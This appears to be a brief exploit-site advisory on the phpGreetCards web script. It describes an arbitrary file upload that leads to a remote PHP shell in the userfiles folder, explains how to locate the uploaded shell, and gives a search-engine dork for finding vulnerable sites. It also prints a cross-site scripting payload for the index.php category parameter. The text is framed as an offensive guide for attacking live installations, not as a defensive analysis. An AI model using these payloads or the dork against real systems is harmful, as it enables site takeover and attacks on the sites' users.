phpGreetCards suffers from cross site scripting and arbitrary file upload vulnerabilities.
a2be1b3387841df12e259f185ccde1b1055faa3a8c4feb5fa10070b2e87519c7
...................................................................................................
****(remote shell upload/xss)****
script: phpGreetCards
***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip
***************************************************************************
www.site.com/path/index.php?mode=select&category
shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"
if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.
------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************
Author: ahmadbady
**************************************************